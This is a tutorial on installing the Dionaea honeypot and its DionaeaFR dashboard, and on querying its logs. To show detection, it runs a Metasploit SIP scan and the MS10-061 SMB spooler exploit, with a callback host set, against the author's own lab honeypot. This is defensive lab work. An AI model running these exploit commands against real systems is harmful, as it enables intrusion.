Dionaea – A malware collection honeypot
Introduction
This post outlines the requirements, configuration and step-by-step installation procedure for the Dionaea honeypot. It then shows how attacks from external hosts are logged and presents the results in a dashboard interface for ease of understanding.
Dionaea
Dionaea is a modern malware collection honeypot designed to trap malware that exploits vulnerabilities exposed by network services, in order to obtain a copy of that malware. It emulates the protocols below with Python embedded as its scripting language, detects shellcode with libemu, and supports IPv6 and TLS. Dionaea traps malware arriving over the following protocols:
• SMB (Server Message Block)
• HTTP (Hyper Text Transfer Protocol)
• FTP (File Transfer Protocol)
• TFTP (Trivial File Transfer Protocol)
• MSSQL (Microsoft SQL Server)
• VoIP (Voice over IP)
Requirements
Ubuntu 12.04 LTS Server
Note: this guide builds the original carnivore.it sources against Python 3.2. Those git://git.carnivore.it repositories are no longer online; the maintained fork lives at https://github.com/DinoTools/dionaea, so on a current system expect to substitute those sources.
Configuration
· Install the build dependencies
sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libgc-dev libgc1c2 sqlite3 python-geoip sqlite python-pip
· Create the /opt/dionaea/ directory
mkdir /opt/dionaea/
· Create a temporary directory for the build
mkdir ~/src
· Install liblcfg
cd ~/src
git clone git://git.carnivore.it/liblcfg.git liblcfg
cd liblcfg/code
autoreconf -vi
./configure --prefix=/opt/dionaea
make install
· Install libemu
cd ~/src
git clone git://git.carnivore.it/libemu.git libemu
cd libemu
autoreconf -vi
./configure --prefix=/opt/dionaea
make install
ldconfig
· Install libnl
On Ubuntu the packaged version is enough:
apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
Otherwise build it from git:
cd ~/src
git clone git://git.infradead.org/users/tgr/libnl.git
cd libnl
autoreconf -vi
export LDFLAGS=-Wl,-rpath,/opt/dionaea/lib
./configure --prefix=/opt/dionaea
make
make install
ldconfig
· Install libev (download libev-4.04.tar.gz into ~/src first)
cd ~/src
tar -xvzf libev-4.04.tar.gz
cd libev-4.04
./configure --prefix=/opt/dionaea
make install
ldconfig
· Install Python 3.2 (download Python-3.2.2.tgz into ~/src first)
cd ~/src
tar xfz Python-3.2.2.tgz
cd Python-3.2.2
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make
make install
ldconfig
· Install Cython (download Cython-0.21rc1.tar.gz into ~/src first)
cd ~/src
tar xfz Cython-0.21rc1.tar.gz
cd Cython-0.21rc1
/opt/dionaea/bin/python3 setup.py install
ldconfig
· Install libcurl
sudo apt-get install curl libc6 libcurl3 zlib1g
· Install libpcap (download libpcap-1.6.2.tar.gz into ~/src first)
cd ~/src
tar xfz libpcap-1.6.2.tar.gz
cd libpcap-1.6.2
./configure --prefix=/opt/dionaea
make
make install
ldconfig
· Install p0f and create the /nonexistent directory it needs when it drops privileges to nobody
apt-get install p0f -y
cd /
mkdir nonexistent
chown -R nobody:nogroup nonexistent
· Clone Dionaea from its git repository
cd ~/src
git clone git://git.carnivore.it/dionaea.git dionaea
· Compile Dionaea
cd ~/src/dionaea
autoreconf -vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
--with-lcfg-lib=/opt/dionaea/lib/ \
--with-python=/opt/dionaea/bin/python3.2 \
--with-cython-dir=/opt/dionaea/bin \
--with-udns-include=/opt/dionaea/include/ \
--with-udns-lib=/opt/dionaea/lib/ \
--with-emu-include=/opt/dionaea/include/ \
--with-emu-lib=/opt/dionaea/lib/ \
--with-gc-include=/usr/include/gc \
--with-ev-include=/opt/dionaea/include \
--with-ev-lib=/opt/dionaea/lib \
--with-nl-include=/opt/dionaea/include \
--with-nl-lib=/opt/dionaea/lib/ \
--with-curl-config=/usr/bin/ \
--with-pcap-include=/opt/dionaea/include \
--with-pcap-lib=/opt/dionaea/lib/
make
make install
Note: the configure paths above assume every library was built into /opt/dionaea. Two of them were not in the steps above: udns came from the libudns-dev package and, on Ubuntu, libnl from the libnl-3-dev packages, so their headers and libraries live under /usr (for example /usr/include and /usr/lib, with the libnl3 headers in /usr/include/libnl3). If configure fails to find either, point the corresponding --with-*-include and --with-*-lib options at those locations instead.
· Test the Dionaea installation
/opt/dionaea/bin/dionaea --help
/opt/dionaea/bin/dionaea -r /opt/dionaea
DionaeaFR – Dashboard
· Install pip (the Python package manager) and python-netaddr
apt-get install python-pip python-netaddr
· Install the prerequisites with pip
pip install Django
pip install pygeoip
pip install django-pagination
pip install django-tables2
pip install django-compressor
pip install django-htmlmin
· Install django-tables2-simplefilter (download django-tables2-simplefilter.zip into /opt/ first)
cd /opt/
unzip django-tables2-simplefilter.zip
mv django-tables2-simplefilter-master/ django-tables2-simplefilter/
cd django-tables2-simplefilter/
python setup.py install
· Install PySubnetTree
cd /opt/
git clone https://github.com/bro/pysubnettree.git
cd pysubnettree/
python setup.py install
· Compile and install Node.js from source (download node-v0.8.16.tar.gz into /opt/ first)
cd /opt/
tar xzvf node-v0.8.16.tar.gz
cd node-v0.8.16
./configure
make
make install
· Install LESS using npm
npm install -g less
· Download DionaeaFR (DionaeaFR.zip into /opt/) and unpack it
cd /opt/
unzip DionaeaFR.zip
mv DionaeaFR-master/ DionaeaFR
· Get Maxmind's GeoIP and GeoLite City databases (GeoIP.dat.gz and GeoLiteCity.dat.gz into /opt/) and move them into DionaeaFR's static folder
cd /opt/
gunzip GeoLiteCity.dat.gz
gunzip GeoIP.dat.gz
mv GeoIP.dat DionaeaFR/DionaeaFR/static
mv GeoLiteCity.dat DionaeaFR/DionaeaFR/static
· If your Dionaea installation does not follow the official installation guide (prefix /opt/dionaea), set the database path on line 17 of /opt/DionaeaFR/DionaeaFR/settings.py to the location of Dionaea's SQLite database (/opt/dionaea/var/dionaea/logsql.sqlite with the layout above)
· Set the STATIC_ROOT variable in settings.py to DionaeaFR's static folder, i.e. /opt/DionaeaFR/static/
· To start DionaeaFR
cd /opt/DionaeaFR/
sudo python manage.py collectstatic   # type yes when asked
sudo python manage.py runserver 0.0.0.0:8080
· Because the server binds to 0.0.0.0, DionaeaFR's interface is also reachable from other hosts. Note that this is Django's development server with no authentication in front of it, so restrict access to port 8080 with a firewall, or bind it to 127.0.0.1 and reach it over an SSH tunnel.
Logging
Run Dionaea to start logging. In this walkthrough Dionaea runs on 192.168.0.109; after starting it, check which sockets it is listening on with netstat (add -u to the options to also list the UDP sockets, such as SIP on 5060 and TFTP on 69):
• /opt/dionaea/bin/dionaea -r /opt/dionaea
• netstat -ntlp | grep 192.168.0.109
An nmap scan of 192.168.0.109 reports the ports listed above as open, and the emulated services can be probed for the vulnerabilities associated with them. For example, SIP can be enumerated with Metasploit's auxiliary scanner modules; while the scan runs, Dionaea records the traffic, as the log excerpt in the figure below shows.
The auxiliary SIP OPTIONS scan on port 5060:
• msfcli auxiliary/scanner/sip/options CHOST=192.168.0.169 CPORT=5066 RHOST=192.168.0.109 RPORT=5060 E
Looking at the Dionaea log file at /opt/dionaea/var/log/dionaea.log, we can inspect the connection traffic and find possible attack indicators. Querying Dionaea's logsql SQLite database with the readlogsqltree Python script, however, gives far more readable output: for each incident it reports the exploited vulnerability, the time, the attacker and details of any shellcode.
• python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Now let's exploit MS10-061, the vulnerability in the Windows Print Spooler service that allows remote code execution. The spooler is reached through SMB, which Dionaea emulates to trap malware, so we run the Metasploit module against the honeypot:
• msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.0.109 EXITFUNC=process LHOST=192.168.0.169 LPORT=4444 E
Dionaea detects and logs the incident, as shown in the figure below.
Let's check the /opt/dionaea/var/dionaea/binaries directory to see whether Dionaea captured a binary executable. Here we go:
Querying the logsql SQLite database again gives a better understanding of the traffic the attack generated:
• python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
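readlogsqltree prints one incident at a time; for triage it is often more useful to run your own queries against logsql.sqlite and to cross-check what is on disk against what was logged. The following Python 3 script is an added example for this post, not code from the original article or from Dionaea. It rests on two assumptions that should be checked against `sqlite3 logsql.sqlite .schema` on a real installation: the column names of the connections and downloads tables (a reduced subset is recreated below from memory), and that Dionaea stores each captured file in var/dionaea/binaries/ under its MD5 hex digest. The sample connections, hosts, timestamps and payload bytes are constructed to mirror the walkthrough above; none of them come from a real capture.

```python
"""Query a Dionaea logsql.sqlite directly and verify captured binaries.

Added example (not Dionaea's readlogsqltree). Schema subset and the
binaries/<md5> layout are assumptions; check them with `.schema`.
"""
import hashlib
import json
import os
import sqlite3
import tempfile

# Reduced subset of Dionaea's logsql schema (assumption, recreated from memory).
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_type TEXT,
    connection_transport TEXT, connection_protocol TEXT,
    connection_timestamp INTEGER, connection_root INTEGER,
    connection_parent INTEGER, local_host TEXT, local_port INTEGER,
    remote_host TEXT, remote_hostname TEXT, remote_port INTEGER
);
CREATE TABLE downloads (
    download INTEGER PRIMARY KEY, connection INTEGER,
    download_url TEXT, download_md5_hash TEXT
);
"""

# Constructed sample: two SIP probes from the scanning host used above, an SMB
# session from the same host, and an SMB session from a second (made-up) host.
SAMPLE_CONNECTIONS = [
    (1, "accept", "udp", "SipSession", 1400000000, 1, 1,
     "192.168.0.109", 5060, "192.168.0.169", "", 5066),
    (2, "accept", "udp", "SipSession", 1400000001, 2, 2,
     "192.168.0.109", 5060, "192.168.0.169", "", 5066),
    (3, "accept", "tcp", "smbd", 1400000100, 3, 3,
     "192.168.0.109", 445, "192.168.0.169", "", 49152),
    (4, "accept", "tcp", "smbd", 1400000200, 4, 4,
     "192.168.0.109", 445, "10.0.0.5", "", 51000),
]
# Constructed payload bytes; their MD5s are computed, never hard-coded.
PAYLOAD_GOOD = b"MZ\x90\x00constructed sample A"
PAYLOAD_TAMPERED = b"MZ\x90\x00constructed sample B"
MD5_NEVER_STORED = "0" * 32  # logged download with no file on disk


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def build_sample(root):
    """Write a logsql.sqlite plus a binaries/ dir under root (constructed data)."""
    db_path = os.path.join(root, "logsql.sqlite")
    bin_dir = os.path.join(root, "binaries")
    os.mkdir(bin_dir)
    good_md5, tampered_md5 = md5_hex(PAYLOAD_GOOD), md5_hex(PAYLOAD_TAMPERED)
    with open(os.path.join(bin_dir, good_md5), "wb") as f:
        f.write(PAYLOAD_GOOD)
    with open(os.path.join(bin_dir, tampered_md5), "wb") as f:
        f.write(PAYLOAD_TAMPERED + b"\x00")  # stored under the right name, contents altered
    downloads = [
        (1, 3, "http://192.168.0.169/payload.exe", good_md5),
        (2, 4, "tftp://10.0.0.5/update.exe", tampered_md5),
        (3, 4, "http://10.0.0.5/x.exe", MD5_NEVER_STORED),
    ]
    conn = sqlite3.connect(db_path)
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO connections VALUES (?,?,?,?,?,?,?,?,?,?,?,?)",
                     SAMPLE_CONNECTIONS)
    conn.executemany("INSERT INTO downloads VALUES (?,?,?,?)", downloads)
    conn.commit()
    conn.close()
    return db_path, bin_dir


def open_logsql(path):
    conn = sqlite3.connect(path)
    conn.row_factory = sqlite3.Row
    return conn


def connections_by_protocol(conn):
    """Count accepted connections per emulated protocol (e.g. SipSession, smbd)."""
    rows = conn.execute(
        "SELECT connection_protocol AS proto, COUNT(*) AS n FROM connections "
        "WHERE connection_type = 'accept' GROUP BY proto ORDER BY n DESC, proto")
    return {r["proto"]: r["n"] for r in rows}


def remote_hosts(conn, protocol=None):
    """Remote hosts ranked by connection count, optionally for one protocol."""
    sql, args = "SELECT remote_host, COUNT(*) AS n FROM connections", ()
    if protocol is not None:
        sql, args = sql + " WHERE connection_protocol = ?", (protocol,)
    sql += " GROUP BY remote_host ORDER BY n DESC, remote_host"
    return [(r["remote_host"], r["n"]) for r in conn.execute(sql, args)]


def downloads_with_context(conn):
    """Join each logged download to the connection that produced it."""
    rows = conn.execute(
        "SELECT d.download_md5_hash AS md5, d.download_url AS url, c.remote_host, "
        "c.connection_protocol AS proto, c.connection_timestamp AS ts "
        "FROM downloads d JOIN connections c ON c.connection = d.connection "
        "ORDER BY d.download")
    return [dict(r) for r in rows]


def verify_binaries(conn, binaries_dir):
    """Check every logged MD5 exists as binaries/<md5> and still hashes to it."""
    status = {}
    for r in conn.execute("SELECT DISTINCT download_md5_hash AS md5 FROM downloads"):
        path = os.path.join(binaries_dir, r["md5"])
        if not os.path.isfile(path):
            status[r["md5"]] = "missing"
            continue
        with open(path, "rb") as f:
            status[r["md5"]] = "ok" if md5_hex(f.read()) == r["md5"] else "hash-mismatch"
    return status


def demo():
    """Build the constructed sample in a temp dir and run every query on it."""
    with tempfile.TemporaryDirectory() as tmp:
        db_path, bin_dir = build_sample(tmp)
        conn = open_logsql(db_path)
        try:
            return {"by_protocol": connections_by_protocol(conn),
                    "all_sources": remote_hosts(conn),
                    "sip_sources": remote_hosts(conn, "SipSession"),
                    "downloads": downloads_with_context(conn),
                    "binaries": verify_binaries(conn, bin_dir)}
        finally:
            conn.close()


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Against a live honeypot, replace build_sample with open_logsql("/opt/dionaea/var/dionaea/logsql.sqlite") and verify_binaries(conn, "/opt/dionaea/var/dionaea/binaries"). A "missing" or "hash-mismatch" result means the file and the log disagree, which is worth knowing before any captured sample is shipped off for analysis.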
Dashboard
DionaeaFR is a front-end dashboard for visualizing the results of the Dionaea honeypot. It shows the connections, the downloaded malware and the attackers' geolocations, and can filter the results by state, protocol, service, port and remote port. It runs on the local machine and is also reachable remotely. To run DionaeaFR:
• cd /opt/DionaeaFR
• sudo python manage.py collectstatic   # type yes when asked
• sudo python manage.py runserver 0.0.0.0:8080
Using the filters, the SIP sessions can be seen in the figure below.
The downloaded malware can be seen in the dashboard interface.
Conclusion
The collected malware can be analyzed further to better understand the attacks. The attackers' geolocations can be seen in the dashboard's map view, and the dashboard can also be accessed remotely for interactive monitoring.
Comments
Thank you, it was very helpful.
You are welcome!! A few more important posts to come!
Good post (y)